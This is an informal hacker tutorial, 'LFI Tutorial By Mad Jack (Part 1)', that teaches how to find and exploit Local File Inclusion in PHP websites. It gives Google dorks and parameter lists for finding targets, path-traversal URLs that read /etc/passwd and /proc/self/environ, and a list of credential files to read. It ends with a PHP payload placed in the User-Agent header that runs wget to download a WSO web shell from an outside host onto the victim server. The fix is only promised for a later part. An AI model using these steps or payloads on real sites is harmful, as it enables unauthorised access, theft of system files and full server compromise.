Local File Inclusion(LFI) Tutorial By Mad Jack!(PART 1)

Hello everyone ,
This Is Mad jack! From Pak Cyber Pythons.
So Today i m going to teach u LFI vulnerability in web applications and how to fix it..

SO FIRST THING IS WHAT IS LFI ?
LFI means Local File Inclusion. Through LFI vulnerability u can read files on a website/server via your browser.

First of all u need a LFI vulnerable website.
There are many softwares to check the LFI vuln in websites.
Also there are some dorks to find LFI vuln sites..

Just put inurl:.php before using dork like:

inurl:.view.php?id=

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url= 

After using these dorks u can find many websites but all are not vulnerable by LFI.
But u can find sites which is vulnerable by LFI.

Example i can find a website :

www.victimsite.com/action.php?page=contact.php 

Now we are going to check it is vuln or not so that we can replace contact.php with ../ so the url become.

www.victimsite.com/action.php?page=../

check the source code and chck if u got this error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/victimsite.com/action.php on line 1337 

If u got this shitty error or some thing like this there is a large chances that website is vuln by LFI.
Or if u get blank page so website is not vuln by LFI.

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

www.victimsite.com/action.php?page=../../../etc/passwd 

we got error and no etc/passwd file.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 

so we go more directories up to find etc/passwd file..

www.victimsite.com/action.php?page=../../../../../../etc/passwd 

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin 

There are alsao good directories that can u visit :-)

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default 

Checking if proc/self/environ is accessible.

 Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

www.victimsite.com/action.php?page=../../../../../proc/self/environ 

If u get something like this :

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible.

Now how to inject malicious code ?
Now  inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

Choose Tamper and in User-Agent filed write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...

<?system(‘wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php’);?>

EXAMPLE :

<?system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>

If don work,try exec() because system() can be disabled on the webserver from php.ini.

It is not important to upload ur shell in drivehq u can use ur own site or othe free web hosting sites..

<?system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>

After u upload ur shell through this code u can access ur shell.

www.victimsite.com/shell.php

THANKS FOR READING....

In part 2 i will teach u How to fix LFi vulnerability :)

It's All about LFi..
Commnet Below OR Give Us Your Feedback , ON FACEBOOK..
LIKES US ON FACEBOOK By Clicking Here

Special Thanks To : JinX , Napster Dotnet..

Author : Mad Jack

NOTE:Only For Educational Purpose :)